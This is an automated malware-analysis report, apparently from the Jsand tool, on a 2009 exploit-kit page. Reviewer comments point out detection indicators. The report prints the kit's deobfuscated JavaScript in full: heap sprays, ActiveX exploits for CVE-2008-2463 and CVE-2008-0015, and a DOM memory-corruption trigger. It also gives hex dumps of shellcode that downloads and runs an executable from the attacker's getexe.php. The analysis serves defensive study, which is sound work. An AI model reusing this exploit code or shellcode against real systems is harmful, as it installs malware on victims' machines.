Analysis report for http://silver-metscorp.com/1/index.php?spl=1
Sample Overview
| URL | http://silver-metscorp.com/1/index.php?spl=1 |
|---|
| MD5 | 82a91eddef1b51feccdad3ec4e005f9a |
| Analysis Started | 2009-09-03 10:56:14 |
| Report Generated | 2009-09-03 10:56:38 |
| Jsand version | 1.03.02 |
See the report for domain silver-metscorp.com.
Detection results
| Detector | Result |
| Jsand 1.03.02 | malicious |
Exploits
| Name | Description | Reference |
| Office Snapshot Viewer | The Microsoft Office Snapshot Viewer ActiveX control allows remote attackers to download arbitrary files to a client machine | CVE-2008-2463 |
| MsVidCtl Overflow | Overflow in Microsoft Video ActiveX Control via specially-crafted data parameter | CVE-2008-0015 |
Deobfuscation results
Evals
No evals.
Writes
-
(repeated 4 times)
// Stage 1 (as extracted by the analysis tool; the document.write string
// literal is shown broken across lines in this dump): instantiate an
// <object> by CLSID, read its version, and when the major version is 6..9
// inject an <iframe> that loads pdf.php?spl=pdf_ie2 from the same host.
// The CLSID is the one recorded under "ActiveX controls" below with a single
// GetVersions call; this report does not say which product it identifies —
// NOTE(review): it is commonly associated with a PDF reader browser plugin,
// which would fit the pdf.php target, but confirm before relying on it.
// Detection value: the CLSID string, the GetVersions() probe and the
// pdf.php?spl=pdf_ie2 URL are all usable indicators.
function ttRDNIoIn4yEo0i(){
try {
var KatIiicvbWTZd3V = document.createElement("object");
KatIiicvbWTZd3V.setAttribute("id", "KatIiicvbWTZd3V");
KatIiicvbWTZd3V.setAttribute("classid", "clsid:CA8A9780-280D-11CF-A24D-444553540000");
// GetVersions() is treated as a comma-separated list; field 4 is split on
// "=" and the first dotted component of its value is taken as the major
// version. zWmapVJRRvyuUcx is assigned without var (implicit global).
var kkOeymxm5kq4yeC = KatIiicvbWTZd3V.GetVersions();
kkOeymxm5kq4yeC = kkOeymxm5kq4yeC.split(",");
kkOeymxm5kq4yeC = kkOeymxm5kq4yeC[4].split("=");
kkOeymxm5kq4yeC = kkOeymxm5kq4yeC[1];
zWmapVJRRvyuUcx = kkOeymxm5kq4yeC.split(".");
zWmapVJRRvyuUcx = zWmapVJRRvyuUcx[0];
// Version gate: the string is compared numerically by coercion; only
// major versions 6 through 9 receive the iframe.
if ((zWmapVJRRvyuUcx <= 9) && (zWmapVJRRvyuUcx >= 6)){
document.write("
<iframe src=\"http://silver-metscorp.com/1/pdf.php?spl=pdf_ie2\" width=\"89\" height=\"108
\" frameborder=\"0\"></iframe>");
}
}
// Empty catch: a missing control or absent method fails silently, so the
// probe leaves no visible error on machines without the plugin.
catch (e){
}
}
setTimeout("ttRDNIoIn4yEo0i();", 300);
(repeated 1 time)
-
(repeated 4 times)
<iframe src="http://silver-metscorp.com/1/pdf.php?spl=pdf_ie2" width="89" height="108" frameborder=
"0"></iframe>
(repeated 1 time)
// Stage 2 (as extracted by the analysis tool; the long string literal is
// shown broken across lines in this dump): heap spray followed by an
// <object> instantiated by CLSID. The CLSID and the width/height/data
// attributes set below are the ones recorded for 0955AC62-... under
// "ActiveX controls"; NOTE(review): this presumably corresponds to the
// "MsVidCtl Overflow" (CVE-2008-0015) entry in the Exploits table above,
// whose description mentions a specially-crafted data parameter — confirm.
// The <div> written here is later reached through IE's named-element
// global (QkJlOPI.appendChild), not via getElementById.
document.write("<div id=\"QkJlOPI\">");
var Wc4NBot = "
%uA164%u0018%u0000%u408B%u8B30%u5440%u408B%u8B04%u0440%u408B%u0D04%u0020%u0020%u7C3D%u7700
%u7400%uC301%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40
%u588B%u6A3C%u5A4E%uE2D1%uE22B%uEC8B%u45C7%u6E10%u652E%uC778%u1445%u01FF%u0000%u45C7%u0000
%u0000%uEB00%u5A4F%u8352%u56EA%u5589%u5618%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303
%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575
%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u571C%uB852
%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u458B%uAB10%u9866%uAB66%uC033%u61B8%u0064
%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8318%u0CC4%uB050%u8A6C
%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u1855%uC483%u930C%u3350%u50C0
%u5650%u558B%u0318%u1455%u5052%u36B8%u2F1A%uFF70%u1855%u835B%u007D%u0F01%u9E85%u0000%u6A00
%u6800%u0080%u0000%u036A%u006A%u036A%u0068%u0000%u56C0%uA5B8%u0017%uFF7C%u1855%u4589%u6A04
%u6804%u1000%u0000%u0068%u0800%u6A00%uB800%uCA54%u91AF%u55FF%u8918%u0C45%u6A50%u8D00%u084D
%u6851%u0000%u0008%uFF50%u0475%u16B8%uFA65%uFF10%u1855%u8B5F%u8317%u04C7%u4D8B%u8308%u04E9
%uA7E8%u0000%u6A00%u6A00%u6A00%uFF00%u0475%uACB8%uDA08%uFF76%u1855%u006A%u4D8D%u5108%u75FF
%uFF08%u0C75%u0483%u0424%u75FF%uB804%u791F%uE80A%u55FF%uFF18%u0475%uFBB8%uFD97%uFF0F%u1855
%u45C7%u0200%u0000%u5700%uB856%uFE98%u0E8A%u55FF%uEB18%u182A%uF92A%uD2B7%uB377%u4501%u928A
%uADB7%u5D50%u67E4%uE6F5%u1AC7%uABBF%u101E%u7642%uA1A2%u6354%u7B09%uB089%u97F4%u734E%u3F93
%u83F1%u007D%u7402%uC760%u0045%u0001%u0000%u45C7%u7910%u652E%uC778%u1445%u0172%u0000%u7D8B
%u0318%u147D%u26B9%u0000%u8B00%uFC57%u05E8%u0000%uE900%uFE7C%uFFFF%uC033%u078A%uC8D2%uC132
%uD0F6%uC532%uC232%uC632%uC0D2%uC102%uC502%uC202%uC602%uC8D2%uC12A%uC52A%uD0F6%uC22A%uC62A
%uC0D2%uC2D3%uCA0F%u0788%u4947%uCE75%uC3C3%u7468%u7074%u2F3A%u732F%u6C69%u6576%u2D72%u656D
%u7374%u6F63%u7072%u632E%u6D6F%u312F%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6944
%u6572%u7463%u5F58%u5344";
// Decode the %u-encoded payload into a UTF-16 string. Its tail spells
// "...getexe.php?spl=DirectX_DS", matching the first dump in the report's
// "Shellcode and Malware" section, which is the decoded form of this blob.
var VGkmfi9 = unescape(Wc4NBot);
// Filler assembled by concatenation so the literal "%u9090" never appears
// in the source (defeats naive string signatures); 0x90 is the x86 NOP.
var rFajaA1 = unescape("%u9" + "090%u9" + "09" + "0");
var vCoqwv3 = 20;
var EHmpupC = vCoqwv3 + VGkmfi9.length;
while (rFajaA1.length < EHmpupC)rFajaA1 += rFajaA1;
var ee7WvrJ = rFajaA1.substring(0, EHmpupC);
var VZS1p3j = rFajaA1.substring(0, rFajaA1.length - EHmpupC);
// Grow each filler block to just under 0x40000 characters ...
while (VZS1p3j.length + EHmpupC < 0x40000)VZS1p3j = VZS1p3j + VZS1p3j + ee7WvrJ;
var TDjGPY7 = new Array();
// ... and keep 350 copies of filler+payload alive in an array (heap spray).
// jT9Hlu7 is assigned without var (implicit global).
for (jT9Hlu7 = 0; jT9Hlu7 < 350; jT9Hlu7 ++ ){
TDjGPY7[jT9Hlu7] = VZS1p3j + VGkmfi9
}
// 1x1 <object> appended to the div written above; 'dx_ds.gif' is the file
// passed as its data attribute and is a useful network/host indicator.
var iGbuq4u = document.createElement('object');
QkJlOPI.appendChild(iGbuq4u);
iGbuq4u.width = '1';
iGbuq4u.height = '1';
iGbuq4u.data = 'dx_ds.gif';
iGbuq4u.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
(repeated 1 time)
-
(repeated 1 time)
// Stage 3 (as extracted by the analysis tool): abuse of the
// "snpvw.Snapshot Viewer Control.1" ActiveX control, which is the
// "Office Snapshot Viewer" entry (CVE-2008-2463) in the Exploits table
// above — "allows remote attackers to download arbitrary files to a client
// machine". SnapshotPath is pointed at getexe.php?spl=Snapshot (the report
// lists a PE download at that URL) and CompressedPath at WAB.EXE on the
// c:, d: and e: drives; the report's ActiveX table records PrintSnapshot
// being called three times with exactly these values.
// Detection value: the control ProgID, the getexe.php URL, and a
// modified/overwritten "Program Files/Outlook Express/WAB.EXE".
function mDwSiZFeOx2tpnX(){
var wrdvlRgFL0VYC3z = "http://silver-metscorp.com/1/getexe.php?spl=Snapshot";
var NZCr3uRHZpEai5O;
var MnFtj2LQHgamFmo;
var uiOQaQL2huqwVZ2 = new Array();
uiOQaQL2huqwVZ2[0] = "c:/Program Files/Outlook Express/WAB.EXE";
uiOQaQL2huqwVZ2[1] = "d:/Program Files/Outlook Express/WAB.EXE";
uiOQaQL2huqwVZ2[2] = "e:/Program Files/Outlook Express/WAB.EXE";
var Dpp0jYB5zSlZF1M = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
if (Dpp0jYB5zSlZF1M){
// Navigates to an ldap: URL 3 s later. NOTE(review): presumably intended to
// launch the protocol handler for ldap: after WAB.EXE has been replaced —
// confirm; the listing itself does not say.
setTimeout('window.location = "ldap://"', 3000);
// Rendered here without the space between the loop variable and "in";
// this is how the tool printed it (for ... in over the three paths).
for (NZCr3uRHZpEai5Oin uiOQaQL2huqwVZ2){
MnFtj2LQHgamFmo = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
var dF5Sfet2gbwXXS7 = wrdvlRgFL0VYC3z;
var uMwNVfwhjwAUWPV = uiOQaQL2huqwVZ2[NZCr3uRHZpEai5O];
MnFtj2LQHgamFmo.Zoom = 0;
MnFtj2LQHgamFmo.ShowNavigationButtons = false;
MnFtj2LQHgamFmo.AllowContextMenu = false;
MnFtj2LQHgamFmo.SnapshotPath = dF5Sfet2gbwXXS7;
// Each attempt is isolated in its own try so a missing drive does not
// stop the loop; errors are swallowed.
try {
MnFtj2LQHgamFmo.CompressedPath = uMwNVfwhjwAUWPV;
MnFtj2LQHgamFmo.PrintSnapshot();
}
catch (e){
}
}
}
}
mDwSiZFeOx2tpnX();
(repeated 1 time)
// Stage 4 (as extracted by the analysis tool; the string literal is shown
// broken across lines in this dump): a second heap spray with a different
// payload and filler, followed by preparation of 1000 <img> elements used
// by the function below. This stage is not attributed to either CVE in the
// report's Exploits table.
// The decoded payload's tail spells "...getexe.php?spl=mem_cor", matching
// the second dump under "Shellcode and Malware".
var JNs2feGvIMOLw6f = unescape("
%uA164%u0018%u0000%u408B%u8B30%u5440%u408B%u8B04%u0440%u408B%u0D04%u0020%u0020%u7C3D%u7700
%u7400%uC301%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40
%u588B%u6A3C%u5A4E%uE2D1%uE22B%uEC8B%u45C7%u6E10%u652E%uC778%u1445%u01FF%u0000%u45C7%u0000
%u0000%uEB00%u5A4F%u8352%u56EA%u5589%u5618%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303
%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575
%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u571C%uB852
%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u458B%uAB10%u9866%uAB66%uC033%u61B8%u0064
%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8318%u0CC4%uB050%u8A6C
%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u1855%uC483%u930C%u3350%u50C0
%u5650%u558B%u0318%u1455%u5052%u36B8%u2F1A%uFF70%u1855%u835B%u007D%u0F01%u9E85%u0000%u6A00
%u6800%u0080%u0000%u036A%u006A%u036A%u0068%u0000%u56C0%uA5B8%u0017%uFF7C%u1855%u4589%u6A04
%u6804%u1000%u0000%u0068%u0800%u6A00%uB800%uCA54%u91AF%u55FF%u8918%u0C45%u6A50%u8D00%u084D
%u6851%u0000%u0008%uFF50%u0475%u16B8%uFA65%uFF10%u1855%u8B5F%u8317%u04C7%u4D8B%u8308%u04E9
%uA7E8%u0000%u6A00%u6A00%u6A00%uFF00%u0475%uACB8%uDA08%uFF76%u1855%u006A%u4D8D%u5108%u75FF
%uFF08%u0C75%u0483%u0424%u75FF%uB804%u791F%uE80A%u55FF%uFF18%u0475%uFBB8%uFD97%uFF0F%u1855
%u45C7%u0200%u0000%u5700%uB856%uFE98%u0E8A%u55FF%uEB18%u182A%uF92A%uD2B7%uB377%u4501%u928A
%uADB7%u5D50%u67E4%uE6F5%u1AC7%uABBF%u101E%u7642%uA1A2%u6354%u7B09%uB089%u97F4%u734E%u3F93
%u83F1%u007D%u7402%uC760%u0045%u0001%u0000%u45C7%u7910%u652E%uC778%u1445%u0172%u0000%u7D8B
%u0318%u147D%u26B9%u0000%u8B00%uFC57%u05E8%u0000%uE900%uFE7C%uFFFF%uC033%u078A%uC8D2%uC132
%uD0F6%uC532%uC232%uC632%uC0D2%uC102%uC502%uC202%uC602%uC8D2%uC12A%uC52A%uD0F6%uC22A%uC62A
%uC0D2%uC2D3%uCA0F%u0788%u4947%uCE75%uC3C3%u7468%u7074%u2F3A%u732F%u6C69%u6576%u2D72%u656D
%u7374%u6F63%u7072%u632E%u6D6F%u312F%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u656D
%u5F6D%u6F63%u0072");
var GmesdME6QSX4RJZ = new Array();
// Block size chosen so filler + payload lands just under 0x100000 bytes
// (length is in UTF-16 units, hence the *2 and the /2 below).
var x5wz7ceMXwivIf2 = 0x100000 - (JNs2feGvIMOLw6f.length * 2 + 0x01020);
var EzSyyYbdv9ae5sJ = unescape("%u0C0C%u0C0C");
while (EzSyyYbdv9ae5sJ.length < x5wz7ceMXwivIf2 / 2){
EzSyyYbdv9ae5sJ += EzSyyYbdv9ae5sJ;
}
var BqocjRyyXPQ5SsN = EzSyyYbdv9ae5sJ.substring(0, x5wz7ceMXwivIf2 / 2);
// Rendered by the tool as a bare identifier expression (no effect as
// written); the original presumably released the filler string.
deleteEzSyyYbdv9ae5sJ;
// 0xC0 (192) copies of filler+payload kept alive in an array (heap spray).
// QpAtRtKQrrqIwJA is assigned without var (implicit global).
for (QpAtRtKQrrqIwJA = 0; QpAtRtKQrrqIwJA < 0xC0; QpAtRtKQrrqIwJA ++ ){
GmesdME6QSX4RJZ[QpAtRtKQrrqIwJA] = BqocjRyyXPQ5SsN + JNs2feGvIMOLw6f;
}
// CollectGarbage() is a JScript/IE-specific global; its presence is itself
// a common indicator of browser-exploit JavaScript.
CollectGarbage();
// String assigned as the src of 1000 <img> elements by the function below.
var ML0mJ9LulH4Lv8E = unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var fC4O7VHQv0ImRE6 = new Array();
for (var qZg6sDFg2pQzhwO = 0; qZg6sDFg2pQzhwO < 1000; qZg6sDFg2pQzhwO ++ )fC4O7VHQv0ImRE6.
push(document.createElement("img"));
// Stage 4 trigger (as extracted by the analysis tool): creates a <tbody>,
// clones it, clears the original's attributes, drops the reference and
// forces garbage collection, then touches the clone after rewriting the
// src of the 1000 pre-created <img> elements. The sequence is consistent
// with a browser DOM memory-corruption attempt operating on a released
// element; the specific issue is not identified in this report and is not
// one of the two CVEs in its Exploits table — NOTE(review): confirm.
// The loop's increment is shown split across lines in this dump.
function B1f3l1mfhSKfBKY(){
// MYQkLktgfeyj1tq is assigned without var (implicit global).
MYQkLktgfeyj1tq = document.createElement("tbody");
// Property read, not a call: .click is accessed without parentheses here
// and again on the clone at the end.
MYQkLktgfeyj1tq.click;
var f84IW0noajxsWP7 = MYQkLktgfeyj1tq.cloneNode();
MYQkLktgfeyj1tq.clearAttributes();
MYQkLktgfeyj1tq = null;
CollectGarbage();
// Local qZg6sDFg2pQzhwO shadows the top-level loop variable of the same name.
for (var qZg6sDFg2pQzhwO = 0; qZg6sDFg2pQzhwO < fC4O7VHQv0ImRE6.length; qZg6sDFg2pQzhwO
++ )fC4O7VHQv0ImRE6[qZg6sDFg2pQzhwO].src = ML0mJ9LulH4Lv8E;
f84IW0noajxsWP7.click;
}
window.setTimeout("B1f3l1mfhSKfBKY();", 500);
(repeated 1 time)
Network Activity
Requests
| URL | Status | Content Type |
| http://silver-metscorp.com/1/index.php?spl=1 | 200 | text/html |
| http://silver-metscorp.com/1/index.php?spl=2 | 200 | text/html |
| http://silver-metscorp.com/1/index.php?spl=3 | 200 | text/html |
| http://silver-metscorp.com/1/index.php?spl=4 | 200 | text/html |
Redirects
No redirects.
ActiveX controls
-
| CA8A9780-280D-11CF-A24D-444553540000 |
|
Name |
Count |
| Methods |
GetVersions |
1 |
|
Name | Value | Count |
| Attributes |
id |
KatIiicvbWTZd3V |
1 |
-
| 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF |
|
Name | Value | Count |
| Attributes |
width |
1 |
1 |
| data |
dx_ds.gif |
1 |
| height |
1 |
1 |
-
| snpvw.Snapshot Viewer Control.1 |
|
Name |
Count |
| Methods |
PrintSnapshot |
3 |
|
Name | Value | Count |
| Attributes |
ShowNavigationButtons |
false |
3 |
| Zoom |
0.0 |
3 |
| CompressedPath |
e:/Program Files/Outlook Express/WAB.EXE |
1 |
d:/Program Files/Outlook Express/WAB.EXE |
1 |
c:/Program Files/Outlook Express/WAB.EXE |
1 |
| AllowContextMenu |
false |
3 |
| SnapshotPath |
http://silver-metscorp.com/1/getexe.php?spl=Snapshot |
3 |
-
| clsid:ca8a9780-280d-11cf-a24d-444553540000 |
|
Name |
Count |
| Methods |
GetVersions |
1 |
Shellcode and Malware
| Hexadecimal | ASCII |
64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b
40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74
01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c
ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a
4e 5a d1 e2 2b e2 8b ec c7 45 10 6e 2e 65 78 c7
45 14 ff 01 00 00 c7 45 00 00 00 00 00 eb 4f 5a
52 83 ea 56 89 55 18 56 57 8b 73 3c 8b 74 33 78
03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff
36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb
ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48
8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d
1c 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b
f7 f2 ae 4f 8b 45 10 ab 66 98 66 ab 33 c0 b8 61
64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54
53 b8 aa fc 0d 7c ff 55 18 83 c4 0c 50 b0 6c 8a
e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e
4e 0e ec ff 55 18 83 c4 0c 93 50 33 c0 50 50 56
8b 55 18 03 55 14 52 50 b8 36 1a 2f 70 ff 55 18
5b 83 7d 00 01 0f 85 9e 00 00 00 6a 00 68 80 00
00 00 6a 03 6a 00 6a 03 68 00 00 00 c0 56 b8 a5
17 00 7c ff 55 18 89 45 04 6a 04 68 00 10 00 00
68 00 00 08 00 6a 00 b8 54 ca af 91 ff 55 18 89
45 0c 50 6a 00 8d 4d 08 51 68 00 00 08 00 50 ff
75 04 b8 16 65 fa 10 ff 55 18 5f 8b 17 83 c7 04
8b 4d 08 83 e9 04 e8 a7 00 00 00 6a 00 6a 00 6a
00 ff 75 04 b8 ac 08 da 76 ff 55 18 6a 00 8d 4d
08 51 ff 75 08 ff 75 0c 83 04 24 04 ff 75 04 b8
1f 79 0a e8 ff 55 18 ff 75 04 b8 fb 97 fd 0f ff
55 18 c7 45 00 02 00 00 00 57 56 b8 98 fe 8a 0e
ff 55 18 eb 2a 18 2a f9 b7 d2 77 b3 01 45 8a 92
b7 ad 50 5d e4 67 f5 e6 c7 1a bf ab 1e 10 42 76
a2 a1 54 63 09 7b 89 b0 f4 97 4e 73 93 3f f1 83
7d 00 02 74 60 c7 45 00 01 00 00 00 c7 45 10 79
2e 65 78 c7 45 14 72 01 00 00 8b 7d 18 03 7d 14
b9 26 00 00 00 8b 57 fc e8 05 00 00 00 e9 7c fe
ff ff 33 c0 8a 07 d2 c8 32 c1 f6 d0 32 c5 32 c2
32 c6 d2 c0 02 c1 02 c5 02 c2 02 c6 d2 c8 2a c1
2a c5 f6 d0 2a c2 2a c6 d2 c0 d3 c2 0f ca 88 07
47 49 75 ce c3 c3 68 74 74 70 3a 2f 2f 73 69 6c
76 65 72 2d 6d 65 74 73 63 6f 72 70 2e 63 6f 6d
2f 31 2f 67 65 74 65 78 65 2e 70 68 70 3f 73 70
6c 3d 44 69 72 65 63 74 58 5f 44 53 | d......@0.@T.@..
@..@.. . .=|.w.t
..3.d.@0x..@..p.
..X....@4.@|.X<j
NZ..+....E.n.ex.
E......E......OZ
R..V.U.VW.s<.t3x
..V.v ..3.IPA.3.
6....8.t......@.
.X;.u.^.F$..f..H
.V........_^P..}
.WR.3..[.....2..
...O.E..f.f.3..a
d..PhThre5$.itPT
S....|.U....P.l.
..Phon.dhurlmT..
N...U.....P3.PPV
.U..U.RP.6./p.U.
[.}........j.h..
..j.j.j.h....V..
..|.U..E.j.h....
h....j..T....U..
E.Pj..M.Qh....P.
u...e...U._.....
.M.........j.j.j
..u.....v.U.j..M
.Q.u..u...$..u..
.y...U..u.......
U..E.....WV.....
.U..*.*...w..E..
..P].g........Bv
..Tc.{....Ns.?..
}..t`.E......E.y
.ex.E.r....}..}.
.&....W.......|.
..3.....2...2.2.
2.............*.
*...*.*.........
GIu...http://sil
ver-metscorp.com
/1/getexe.php?sp
l=DirectX_DS |
64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b
40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74
01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c
ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a
4e 5a d1 e2 2b e2 8b ec c7 45 10 6e 2e 65 78 c7
45 14 ff 01 00 00 c7 45 00 00 00 00 00 eb 4f 5a
52 83 ea 56 89 55 18 56 57 8b 73 3c 8b 74 33 78
03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff
36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb
ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48
8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d
1c 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b
f7 f2 ae 4f 8b 45 10 ab 66 98 66 ab 33 c0 b8 61
64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54
53 b8 aa fc 0d 7c ff 55 18 83 c4 0c 50 b0 6c 8a
e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e
4e 0e ec ff 55 18 83 c4 0c 93 50 33 c0 50 50 56
8b 55 18 03 55 14 52 50 b8 36 1a 2f 70 ff 55 18
5b 83 7d 00 01 0f 85 9e 00 00 00 6a 00 68 80 00
00 00 6a 03 6a 00 6a 03 68 00 00 00 c0 56 b8 a5
17 00 7c ff 55 18 89 45 04 6a 04 68 00 10 00 00
68 00 00 08 00 6a 00 b8 54 ca af 91 ff 55 18 89
45 0c 50 6a 00 8d 4d 08 51 68 00 00 08 00 50 ff
75 04 b8 16 65 fa 10 ff 55 18 5f 8b 17 83 c7 04
8b 4d 08 83 e9 04 e8 a7 00 00 00 6a 00 6a 00 6a
00 ff 75 04 b8 ac 08 da 76 ff 55 18 6a 00 8d 4d
08 51 ff 75 08 ff 75 0c 83 04 24 04 ff 75 04 b8
1f 79 0a e8 ff 55 18 ff 75 04 b8 fb 97 fd 0f ff
55 18 c7 45 00 02 00 00 00 57 56 b8 98 fe 8a 0e
ff 55 18 eb 2a 18 2a f9 b7 d2 77 b3 01 45 8a 92
b7 ad 50 5d e4 67 f5 e6 c7 1a bf ab 1e 10 42 76
a2 a1 54 63 09 7b 89 b0 f4 97 4e 73 93 3f f1 83
7d 00 02 74 60 c7 45 00 01 00 00 00 c7 45 10 79
2e 65 78 c7 45 14 72 01 00 00 8b 7d 18 03 7d 14
b9 26 00 00 00 8b 57 fc e8 05 00 00 00 e9 7c fe
ff ff 33 c0 8a 07 d2 c8 32 c1 f6 d0 32 c5 32 c2
32 c6 d2 c0 02 c1 02 c5 02 c2 02 c6 d2 c8 2a c1
2a c5 f6 d0 2a c2 2a c6 d2 c0 d3 c2 0f ca 88 07
47 49 75 ce c3 c3 68 74 74 70 3a 2f 2f 73 69 6c
76 65 72 2d 6d 65 74 73 63 6f 72 70 2e 63 6f 6d
2f 31 2f 67 65 74 65 78 65 2e 70 68 70 3f 73 70
6c 3d 6d 65 6d 5f 63 6f 72 00 | d......@0.@T.@..
@..@.. . .=|.w.t
..3.d.@0x..@..p.
..X....@4.@|.X<j
NZ..+....E.n.ex.
E......E......OZ
R..V.U.VW.s<.t3x
..V.v ..3.IPA.3.
6....8.t......@.
.X;.u.^.F$..f..H
.V........_^P..}
.WR.3..[.....2..
...O.E..f.f.3..a
d..PhThre5$.itPT
S....|.U....P.l.
..Phon.dhurlmT..
N...U.....P3.PPV
.U..U.RP.6./p.U.
[.}........j.h..
..j.j.j.h....V..
..|.U..E.j.h....
h....j..T....U..
E.Pj..M.Qh....P.
u...e...U._.....
.M.........j.j.j
..u.....v.U.j..M
.Q.u..u...$..u..
.y...U..u.......
U..E.....WV.....
.U..*.*...w..E..
..P].g........Bv
..Tc.{....Ns.?..
}..t`.E......E.y
.ex.E.r....}..}.
.&....W.......|.
..3.....2...2.2.
2.............*.
*...*.*.........
GIu...http://sil
ver-metscorp.com
/1/getexe.php?sp
l=mem_cor. |
Additional (potential) malware (the three downloads below share the same MD5, i.e. one executable served under three names):
| URL | Type | Hash | Analysis |
| http://silver-metscorp.com/1/getexe.php?spl=DirectX_DS |
MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit |
65406a70ba6ce0ddb31ef046fd75fbea |
|
| http://silver-metscorp.com/1/getexe.php?spl=Snapshot |
MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit |
65406a70ba6ce0ddb31ef046fd75fbea |
|
| http://silver-metscorp.com/1/getexe.php?spl=mem_cor |
MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit |
65406a70ba6ce0ddb31ef046fd75fbea |
|